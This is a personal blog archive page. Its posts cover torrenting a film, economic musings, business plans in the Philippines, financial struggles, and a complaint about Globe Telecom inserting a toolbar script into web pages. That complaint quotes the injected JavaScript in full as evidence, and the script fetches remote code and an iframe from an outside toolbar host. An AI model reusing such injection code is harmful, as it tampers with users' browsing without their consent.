Tag Archives: Economy

Everything is going to be OK.

Source CodeI just finished downloading the movie Source Code and I couldn’t resist watching it while I actually wanted to do some other things, even though I kind of finished the things I had planned for today. And I guess I wrote a similar post before, or actually I’m sure, as I found the image of the movie poster as shown next to this text already uploaded to the site.

And I still love the movie and especially the quote “Everything is going to be okay.” as stated quite some time by Captain Colter Stevens, the main character in the film. So I sent it as the daily quote of today, even though I’m quite sure I also sent the quote before. But I guess that’s what we all want to hear, always, that everything is going to be okay.

And while watching I had some strange feelings and strange thoughts as I downloaded the movie illegally through a torrent, especially as I was complaining quite a bit about one of my internet service providers violating the copyright of web pages recently, although that’s a bit of a different story, as they make changes to something while I just downloaded Source Code in it’s original form. At least that’s what I believe. And especially with movies I often watch the trailer and am always amazed about how many people are involved in making a movie. And I am grateful for all those people making such a thing. And no, in this case I didn’t pay for it. And also for most of the music I have on my system I didn’t pay. Most of it is downloaded, copied. And that’s the biggest problem with digital stuff, that you can copy it, for free mostly, even in the original quality. And no, I don’t really feel guilty about it, which is kind of strange, as I also certainly believe the people making the movie should be paid or at least have something in return for what they made. But again, this is kind of what this site, my project Inspiration for Success is all about, or partly about. As the more I think about ‘work’ and ‘business’ and ‘industry’ and ‘paying’ I get the feeling we need some kind of new way to distribute the wealth and maybe the work. As slowly we can produce anything anybody could ever need, slowly we can give any service anybody would ever need. And somehow the payment system we have is standing in the way to let everybody have what he wants to have, at least related to ‘stuff’.

And no, I wouldn’t know how to get there, although we did it before, as I guess in ancient times there was no such thing as money or X-deals. And the weird thing is that technically we are basically at a level what we always wanted, what humanity has striven for so long: ‘have’ stuff without having to work for it.

So let’s find a way, let’s find a way to make sure everybody has the food, the ‘stuff’ and the services he wants. Without continuous asking whether he worked for it or not.

As yes, there is enough of everything, we can produce anything and I’m quite sure most people would (still) love to ‘give’ the work, the effort to make that happen.

So let’s make that happen.

Busy again

Wow, it’s good to be busy again. At least now I don’t have to worry about what to do next, how to find customers or projects and mainly how to sustain myself and the people close to me and the household and such.

But also a bit tiring as I’m not really used to work for many hours a day anymore. And yes, I know it’s tiring to do the work I do, even for a few hours and then you need a break.

Still no clue though how to continue towards my biggest business dream, an internet company with a staff of around 200 people in Cagayan de Oro City. As I know now it is probably very hard to find people with the mindset and skills that I need to make that company work.

But that’s also why I’m mentioning it here. Because maybe you are the ambitious or not so ambitious person who wants to develop himself, help build a company like I have in mind, help build Cagayan de Oro City and The Philippines into a decent city and country where people can just find decent jobs locally and don’t have to go abroad, don’t need to have their mindset abroad because ‘abroad’ means a decent income in probably a not-so-decent job.

So please help me and yourself and Cagayan de Oro City and The Philippines by helping me serve the customer base I’m developing right now.

And yes, my commitment is there, as that company is one of my life goals and I won’t stop moving in that direction until I get there or until I die. And no, it won’t be easy, because with the current Philippine mindset and education don’t seem to be adequate to compete with other countries.

But yes, I promise I will make it work. Are you joining?

Maybe just share some links

Introduction and history of this page

I think this page needs some explanation, as e.g. the title “Maybe just share some links” does not make sense. And I can’t even remember how that title came into being, but it was there and I optimized the page for SEO with it, so I just left it. I may change it though, as I have become better at dealing with things like that.

Next to the strange title I realize that I thought this page was (also) about my issue of having no internet at all for a while, where for ‘internet safety’ reasons I prefer to have at least two connections, as I was running a web development company here at the time and it is very hard to live without internet for a company like that, even though I managed serving customers at the time when I really didn’t have internet. So yeah, even two connections does not guarantee having internet all the time, and right now only one is working, where the other one (Globe) is not working for about nine months now.

So well, time to reorganize this page I guess, as I am going to use it also related to my current issue with Globe, Globe having discontinued the WIMAX service and apparently not having an alternative to at least serve our location. I am pretty sure though there are more locations they cannot serve anymore. And that is one of my reasons to write about it: improve the service of telecom providers and other big companies. Companies who in general are very good in delivering their service, but who are not always that good in handling problems that are not so common, like in our case a pretty remote location, at least related to Globe Telecom.

Original post

Well, couldn’t resists some discussion around Globe hacking websites in a very unethical or maybe even criminal way: Globe hacking websites. And well, if nobody does something about it I guess it will have to be me as again I think companies should serve people in a simple way, like an Internet Service Provider just providing internet access in the best possible, fastest way without any Fair Usage Policies that are actually volume limits or messing with content they have nothing to do with.

TelecomSo yes, it seems all kinds of industries in the world are getting greedy. I never wanted to believe that, but I’m starting to believe that’s the main reason why many people feel so poor.

And this is the code Globe inserts, and as a programmer it even makes me scared as I can’t see straight away what it does and normally these things are called malware or spyware:

<!– Layer8 version –><script>if(top==window){var fn_selector_insertion_script=”http://toolbar.mywebacceleration.com/tbpreload.js”;runFnTbScript = function(){try{var tbInsertion = new FNH.TBInsertion();var tbData = “PFRCRGF0YT48VEJEYXRhSXRlbSBuYW1lPSJob3N0X3VybCIgdmFsdWU9Imh0dHA6Ly93d3cuaW5zcGlyYXRpb24tZm9yLXN1Y2Nlc3MuY29tL3dwLWFkbWluL3Bvc3QucGhwP3Bvc3Q9MzM1NyZhbXA7YWN0aW9uPWVkaXQiID48L1RCRGF0YUl0ZW0+PFRCRGF0YUl0ZW0gbmFtZT0iaW5zZXJ0aW9uIiB2YWx1ZT0iaHR0cDovL3Rvb2xiYXIubXl3ZWJhY2NlbGVyYXRpb24uY29tL3NvdXJjZXMvaW5mcmEvanMvaW5zZXJ0aW9uX3BjLmpzIiBjb25maWd1cmF0aW9uPSJ0cnVlIiA+PC9UQkRhdGFJdGVtPjwvVEJEYXRhPg==”;tbInsertion.parseTBData(tbData);var fnLayer8=tbInsertion.createIframeElement(“fn_layer8”, “http://toolbar.mywebacceleration.com/Globe/fakeToolbar.html”);var owner;if(document.body){owner=document.body;}else{owner=document.documentElement;}var shouldAddDiv=tbInsertion.getAttributeFromTBData(“div_wrapper”);if(shouldAddDiv){var divWrpr=tbInsertion.createElement(“div”, “fn_wrapper_div”);divWrpr.style.position=”fixed”;divWrpr.ontouchstart=function(){return true;};if (typeof fnLayer8 != “undefined”)divWrpr.appendChild(fnLayer8);owner.appendChild(divWrpr);}else{if (typeof fnLayer8 != “undefined”)owner.appendChild(fnLayer8);}var result=tbInsertion.getAttributeFromTBData(“insertion”);if(result){scriptLocation=result;}else{scriptLocation=”http://toolbar.mywebacceleration.com/sources/infra/js/insertion_pc.js”}var fnd=document.createElement(“script”);fnd.setAttribute(“src”,scriptLocation);fnd.setAttribute(“id”,”fn_toolbar_script”);fnd.setAttribute(“toolbardata”,tbData);fnd.setAttribute(“toolbarhash”,”qs1BZYj+W/dkafS6ZPHz5A==”);fnd.setAttribute(“persdata”,”PFByaXZhdGVEYXRhPg0KPFByaXZhdGVJdGVtIGtleT0iY2xvc2VkIiB2YWx1ZT0iZmFsc2UiPg0KPC9Qcml2YXRlSXRlbT4NCjxQcml2YXRlSXRlbSBrZXk9Im1pbmltaXplZCIgdmFsdWU9ImZhbHNlIj4NCjwvUHJpdmF0ZUl0ZW0+DQo8UHJpdmF0ZUl0ZW0ga2V5PSJkZWZhdWx0UGVyc1ZhbHVlcyIgdmFsdWU9InRydWUiPg0KPC9Qcml2YXRlSXRlbT4NCjwvUHJpdmF0ZURhdGE+”);document.body.appendChild(fnd);}catch(e){console.error(“TB preload script failed: ” + e);}};var fne=document.createElement(“script”);fne.setAttribute(“src”,fn_selector_insertion_script);fne.setAttribute(“id”,”fn_selector_insertion_script”);if(fne.addEventListener){fne.onload = runFnTbScript;}else {fne.onreadystatechange = function(){if ((this.readyState == “complete”) || (this.readyState == “loaded”)) runFnTbScript();}};if(document.head==null || document.head==”undefined” ){document.head = document.getElementsByTagName(“head”)[0];}document.head.appendChild(fne);};</script>

Still, unworthy of Globe and The Philippines and the National Telecommunications Commission.

Actions and updates

Maybe you should know that i am not just complaining on this site, on this page. Next to this the following has been going on:

  • I wrote a letter to the CEO of Smart, Mr. Napoleon L. Nazareno, on January 17, 2014 regarding the service of Smart and their misleading Fair Usage Policy. A copy of this letter was sent to the CEO of PLDT, Mr. Manuel V. Pangilinan. Another copy was sent to Mr. Gamaliel A. Cordoba, Commissioner of  the National Communications Commission.
  • I wrote a letter to the CEO of Innove Communications, Inc., Mr. Gil B. Genio on February 3, 2014 about their bad service. Innove Communications, Inc. is the legal entity providing the Globe internet service. A copy of that letter was sent to the CEO of Globe Telecommunications, Inc., Mr. Ernest L. Cu.
  • As I did not get a reply to my firsts letters and as I had found the above script in the restored connection I wrote a second letter to Mr. Napoleon L. Nazareno and Mr. Ernest L. Cu with the suggestion to discuss the issues in Philippine internet and how to improve internet for Filipino people.
  • Atty. Ella Blanca B. Lopez of the Office of the Commissioner of the National Communications Commission confirmed my complaint about the Fair Usage Policy of Smart.
  • Neither Smart nor Globe replied to any of my letters. I cannot verify if my complaint to Smart was behind the visit of Smart engineers on March 19, 2014. These engineers solved a technical problem with my connection and were the people I think should have been involved much, much earlier. But they came, analyzed, fixed and left their contact details. Good job!
  • And just reading the above, and I do know the visit was most likely related to my letter(s) to Smart as I got an e-mail from the Vice President Marketing related to that letter referring to the fact that Mr. Nazareno had assigned him for dealing with the issue.
  • Related to Globe I recently found out that my letter(s) did have some effect internally in the Globe organization, as I know Mr. Cu called someone about it. I don’t know the details of that phone call, but the issue was solved (until a new, more serious, issue arose around November 2016).
  • Related to the hacking of Globe, which I consider a serious offense, I wrote an e-mail to the Department Of Justice on February 21, 2014.
  • Atty. Perla Y. Duque of the Department Of Justice informed me that my concern was forwarded to the NBI for further handling. This was confirmed to me with a copy of a letter to Mr. Vigilio L. Mendez, Director of the National Bureau of investigation on March 5, 2014 by Atty. Perla Y. Duque.
  • On March 21, 2014 I wrote a follow up letter related to the Globe hacking issue to the Mr. Vigilio L. Mendez, Director of the National Bureau of investigation with a copy to Mr. Gamaliel A. Cordoba, Commissioner of the National Telecommunications Commission to provide some more details.
  • On March 27, 2014 I got a very serious, professional reply from Smart related to my letter of February 28, 2014.
  • Around Easter 2014 Globe going around in circles after I reported a week ago or so that some web pages don’t show up properly, presumably related to the script insertion.
  • On April 21, 2014 I received two letters from the National Bureau of investigation confirming they are investigating the issue.
  • On May 6, 2014 I received a text of the NBI with the request to call them. I did on May 7, 2014 and agreed on sending a sworn statement as they indicated that’s what they need.
  • On May 10, 2014 I created my first draft of the sworn statement. Am planning to send that beginning next week, probably Monday May 12, 2014.
  • Finished and sent my sworn statement about Globe hacking websites to the NBI on May 13, 2014.
  • Followed up the status with the NBI and found my concern is on process on July 8, 2014.
  • Sent a follow up letter to Hon. Director Virgilio L. Mendez of the NBI on August 29, 2014 as nothing seems to be happening, at least not at the pace I think is appropriate for what Globe is doing.
  • And the commissioner of the NTC in Cagayan de Oro City, Mr. Teodoro D. Buenavista, Jr., was so kind to officially receive a copy of my sworn statement about Globe hacking websites, also on August 29, 2014, while I mentioned the matter to him while discussing some other matter.
  • Sent an e-mail to a contact of a friend of mine within DOJ. No apparant result or reply. Somewhere September or October 2014.
  • On October 30, 2014 I was asked by my Globe contact and a friend of mine to reboot my router and check if the script was still there. The script was gone and my main problem with a cut off webpage also seems to be solved. Waiting for confirmation that the script has indeed been removed everywhere, not only with me.
  • I just, December 23, 2014, wrote a letter to the CEO of Globe again as I did not get any confirmation that the script is really gone everywhere.
  • Again, no reply from Globe, at least not on or before February 19, 2015, meaning I certainly don’t feel a valued customer. Let’s just publish it here now: letter to CEO of Globe December 2014. Looking forward to your comments.
  • New story, as since last November, November 2016, we don’t have internet anymore. Globe just retired their wireless station without warning because they are moving to new technology. So new technology means we have speed zero now. And of course they keep sending the bills. And according to the technicians recently there is no problem ‘as there are no network issues in the area’.
  • And it is August 31, 2017 now and I did not remember I wrote the last bullet point about my new Globe issue. That issue is still not solved as Globe still does not seem to have an alternative technology with WIMAX capability until now to serve our location. Of course I am still following that up, but kind of amazing a company like Globe can’t serve an existing location anymore for nine months already. Fortunately Smart is still going strong with, yes I guess (very) old technology. But at least that is working, and speed of Globe is still zero.

Inspiration for Success

This page with complaints about the Philippine telecom industry is very much related to Inspiration for Success, as since I encountered the Principles of Success, the book Think and Grow Rich of Napoleon Hill I have slowly changed my ideas about all kinds of things related to success. One of the main things is that I now often find myself searching for opportunity in anything I perceive as negative, like fully losing my internet connection. Another main thing I learned is that ‘success’  is all about serving other people, nothing more, nothing less. I even dare to state now that in life there is virtually nothing else than serving other people, something I never understood, let alone implemented, earlier in my life.

Next to this you may find in my Philippine internet quest things like persistence, like feeling alone and moving on anyhow and again, trying to find something positive in everything, looking for the best and looking to serve people.

But not always easy, as of course I may still complain and my pride is still looking for recognition. But I guess that’s just being human, a human need for recognition, for feeling needed, for being praised.

Persistence again

Happy SunWell, today was about persistence again as it seemed that everything that could go wrong did go wrong, even until fifteen minutes ago.

And I am still wondering if this is what all successful people seem to say, that you just need to go on until you’re there, no matter what.

So right now I am kind of asking myself if I’m successful. And somehow I am, as I am writing this post which is something I wanted to do today. And I just worked a little on the tools page, the part of the site that is going to give value to the site in the form of some kind of service. And I did do some work today, also something I planned. And in the mean time my biggest desire, my greatest dream, the impossible thing that I wanted to happen seems to start happening. So yes, somehow I am successful.

But some part of the success is still missing and I have no clue how to get there. And that is still the financial success I am looking for. And that type of success has different stages, where as of the moment somehow my biggest issue is that I have debts that don’t suit me and that I never expected to have. And somehow I just had some kind of discussion about abundance with someone in Facebook where she was pointing out that abundance comes from cost cutting. But to me abundance is about things coming to you and that is quite the opposite to cutting, cutting anything.

And yes, thinking from reason and what everybody believes you would get richer financially by living within your means and indeed cost cutting if you are living beyond your means or want to save for the future. But thinking from the ideas of Abraham Hicks and the Law of Attraction cost cutting wouldn’t bring you anywhere, except from, indeed, cost cutting, not using stuff. And yes, also Napoleon Hill states that living beyond your means will get you in trouble, will be an issue on the road to success, on the way to financial success.

But looking at myself just working hard also doesn’t bring you anywhere in the end. I used to have some very good jobs and made quite some money, and yes, I saved a lot. And most of my life I have been very frugal and that also brought me to the point where I had quite some money in the bank. And in that period I also spent a lot, on holidays and all kinds of nice stuff.

But in the end it didn’t bring me anywhere. And looking back somehow I was going on ‘strength’, not on ‘feeling’. And from that feeling I went down. Yes, indeed, very slowly, but down I went. But recently I go more from feeling and with that it seems I am going up, no matter how frustrated I am with my financial situation. But up I went, at least emotionally and as a person.

So as of the moment I don’t know for sure what to believe, what to do, how to choose between abundance and cost cutting.

So looking forward to your thoughts.

Crime pays

The last few days I had quite some mood swings. I had quite some high a few days ago playing music like I used to do and going back to the time when I was a student. But today and yesterday were kind of lows.And while writing this post I am very much in doubt whether to write the things that are in my mind or not, as indeed, I am starting to believe that thoughts, words, especially when spoken, are very powerful.

But somewhere in my mind is also that I promised to myself and to you that I would achieve my success fully in the open, that I wouldn’t hold back, also the downs. And there is one thing I still don’t talk or write about as that’s too private, even though I think it’s my biggest turn off, so yes, I’m still keeping something to myself. But it’s just too private and as of the moment sharing it I think would do too much damage, so I won’t or at least I”ll wait until I feel it’s the right time.

I started this post with crime pays where I’m starting to realize that the real saying is crime doesn’t pay, but I’m starting to doubt which one is true, especially feeling myself at the deepest of the deep related to finance, financial success. As it seems there is something like balance, something like what others do to you, you are probably doing to others sooner or later. And until now I held back very much and I try not to do the bad stuff that I feel others did to me, but it’s getting harder and harder. And the reason is that some of the things that happened to me especially the last few years, especially business wise, just feel wrong. I feel that people did me wrong and that, no matter the mistakes I made myself that lead to where I stand right now, it’s too much, that I have sunk too low. It just feels wrong, it just feels unfair, too unfair.

You see, I’m kind of good person. Too good actually, accepting too much from everybody, too honest and things like that. However, I have one big flaw: my biggest flaw, mistake is that i gave in, still give in, too much to my partner. And that’s my part in the story, that’s my mistake. So that’s wrong, no matter my reasons, my excuses. And in a lighter form I also have that to other people, trying to please too much,  As yes, I just want people to like me. Which they probably and obviously don’t, but that’s another story.

Anyhow, going back to the crime stuff, me being a ‘good’ person or at least considering myself a good person, I have the feeling that too many people have taken advantage of me and are taking advantage of me. And I don’t want to pay back or something in a similar way, but this causes an enormous unbalance. As e.g. financially for quite some time I have not been able to pay some things I feel like I owe people. And that’s a big thing to me. So I’m doing to other people what people have been doing to me: not paying dues. Except for me it’s mainly that I can’t, that I can’t find ways to earn or receive or get money to pay my dues. And somehow it must go back to economy, the time we’re living in right now. As I have the feeling many more people are in a similar situation and that indeed, in general money is still not flowing as it could, as it should.

But again, this creates an enormous inner conflict with me as most of the ‘self help’ stuff I’ve been reading states that you have things in your own hand. That thoughts and attitude and working hard and planning and all that kind of stuff is fully under my, your control. And in a way I indeed do believe that. But somehow something doesn’t add up. As I’m still a human being with his flaws and weaknesses and stuff. And things like economy and state of mind of the world or state of the Universe, even if you consider everything as one or something, still seem to count.

So this feeling of imbalance creates an enormous inner conflict that cries, shouts to be solved. As somehow I have the feeling there is not enough coming to me, not enough coming back. Because I try to give, but somehow it’s not enough or not in the right way. And I try to be good and not paying back bad behaviour or bad things in ways I consider bad. And I try to be happy and grateful as it’s written and stated everywhere. But inside of me something shouts wrong or not enough or ???.

So yes, having the feeling of having nothing left, which I know is subjective as I can still eat and still live in this big house, is continuously asking for attention and kind of eating me and often paralyzing me.

And I still don’t know what to do.

Anyone recognizes this? Or want to give any kind of comment? That would be greatly appreciated and maybe we find a solution, better solutions together. As I’m quite sure I’m not alone.